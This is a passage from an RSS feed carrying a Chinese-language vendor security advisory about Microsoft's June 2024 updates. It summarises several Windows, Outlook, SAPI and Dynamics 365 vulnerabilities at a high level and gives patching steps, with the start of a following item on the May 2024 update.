left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30088、CVE-2024-30099：Windows Kernel本地权限提升漏洞</span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">CVE-2024-30088和CVE-2024-30099都是Windows Kernel中的TOCTOU条件竞争漏洞（CWE-367）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30089：Windows流服务本地权限提升漏洞</span></span></span><br/></span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">CVE-2024-30089是Windows流服务中的释放后重用漏洞（CWE-416）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="width: 577.422px;letter-spacing: 0.578px;white-space: normal;list-style-type: square;"><li style="font-weight: bold;"><section style="margin-bottom: 8px;line-height: 1.6em;text-align: left;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);font-size: 16px;">高评分漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="314" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="70" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30064</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Kernel本地权限提升漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30068</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Kernel本地权限提升漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30078</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Wi-Fi驱动远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30097</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft语音应用编程接口(SAPI)远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-30103</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft Outlook远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-35249</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft Dynamics 365 Business Central远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30064：Windows Kernel本地权限提升漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">该漏洞是Windows Kernel中的整数溢出或环绕漏洞（CWE-190）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以未经授权访问系统资源，并可能允许他们以与受感染进程相同的权限执行操作。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30068：Windows Kernel本地权限提升漏洞</span></span></span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">该漏洞是Windows Kernel中的越界读漏洞（CWE-125）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得SYSTEM权限。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30078：Windows Wi-Fi驱动远程代码执行漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">该漏洞是Windows Wi-Fi驱动中的不正确的输入验证漏洞（CWE-20）。未经身份认证的局域网攻击者可以向使用Wi-Fi网络适配器的相邻系统发送恶意网络数据包，从而实现远程代码执行。</span><br/></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30097：Microsoft语音应用编程接口(SAPI)远程代码执行漏洞</span></span></span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">该漏洞是Microsoft语音应用编程接口(SAPI)中的双重释放漏洞（CWE-415）。未经身份认证的远程攻击者通过诱骗经过身份验证的客户端单击链接来利用此漏洞。成功利用此漏洞的攻击者可以使系统拒绝服务或执行任意代码，从而损害系统完整性和可用性。</span><br/></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">CVE-2024-30103：Microsoft Outlook远程代码执行漏洞</span></span></span><br/></span></span></section></li></ul><p style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">该漏洞是Microsoft Outlook中的不允许输入的不完整列表漏洞（CWE-184）。攻击者必须使用有效的Exchange用户凭据进行身份认证。成功利用此漏洞的攻击者可以绕过Outlook注册表阻止列表并创建恶意DLL文件。可通过预览窗格进行攻击。</span><br/></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-35249：Microsoft Dynamics 365 Business Central远程代码执行漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Microsoft Dynamics 365 Business Central中的不可信数据的反序列化漏洞（CWE-502）。任何经过身份认证的远程攻击者均可触发此漏洞。此漏洞不需要管理员或其他提升的权限。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">影响多个主流版本的Windows，多个主流版本的Microsoft系列软件。</span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x03 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><p style="white-space: normal;margin-top: 16px;margin-bottom: 16px;"><strong><span style="font-size: 16px;">Windows自动更新</span></strong></p></li></ul><section style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">Windows系统默认启用Microsoft Update，当检测到可用更新时，将会自动下载更新并在下一次启动时安装。还可通过以下步骤快速安装更新：</span></section><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”-&gt;“系统和安全”-&gt;“Windows更新”）。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">3、选择“检查更新”，等待系统将自动检查并下载可用更新。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”-&gt;“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。</span></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><strong><span style="font-size: 16px;">手动安装补丁</span></strong><strong><span style="font-size: 14px;"></span></strong><span style="font-size: 14px;"><br/></span></p></li></ul><section style="letter-spacing: 0.578px;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">另外，对于不能自动更新的系统版本，可参考以下链接下载适用于该系统的06月补丁并安装：</span><span style="font-size: 14px;letter-spacing: 0.578px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Jun" target="_blank">https://msrc.microsoft.com/update-guide/releaseNote/2024-Jun</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。<br/></p><section style="white-space: normal;margin-bottom: 0px;"><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span><br/></p></section></section></section></section></section><section style="margin-bottom: 0px;"><section powered-by="xiumi.us"><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section powered-by="xiumi.us"><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section powered-by="xiumi.us"><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;">天融信</span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;">阿尔法实验室</span></p></section></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section powered-by="xiumi.us"><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496633">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=1af7a3e2&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496633%26idx%3D1%26sn%3D48aa313024aec20eeda560151222e620%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 12 Jun 2024 15:11:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于微软2024年05月安全更新的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496631&amp;idx=1&amp;sn=4607ecebf7ad7cb3470c8ec652863261</link>
      <description>2024年05月15日，天融信阿尔法实验室监测到微软官方发布了05月安全更新。此次更新共修复60个漏洞（不包含2个外部分配漏洞和本月早些时候发布的6个Edge漏洞），其中1个严重漏洞、57个重要漏洞、1个中危漏洞、1个低危漏洞。</description>
      <content:encoded><![CDATA[<p>
原创 <span>天融信应急响应</span> <span>2024-05-15 15:06</span> <span style="display: inline-block;">北京</span>
</p>

